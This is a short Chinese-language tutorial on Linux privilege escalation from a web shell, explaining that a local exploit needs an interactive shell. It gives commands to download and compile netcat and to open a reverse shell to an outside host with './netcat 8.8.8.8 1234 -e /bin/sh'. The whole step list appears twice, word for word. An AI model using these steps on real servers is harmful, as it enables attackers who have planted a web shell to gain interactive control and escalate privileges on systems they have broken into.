Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。
Wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
2、解压文件
tar zxvf netcat-0.7.1.tar.gz
3、解压完毕之后会生成目录
cd netcat-0.7.1
4、配置环境
./configure
5、配置完了之后就可以编译了。
Make
6、编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat文件就是我们的nc了。
远程Linux转发命令
./netcat 8.8.8.8 1234 -e /bin/sh
主要步骤:
1、wget一个tar压缩的ncWget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
2、解压文件
tar zxvf netcat-0.7.1.tar.gz
3、解压完毕之后会生成目录
cd netcat-0.7.1
4、配置环境
./configure
5、配置完了之后就可以编译了。
Make
6、编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat文件就是我们的nc了。
远程Linux转发命令
./netcat 8.8.8.8 1234 -e /bin/sh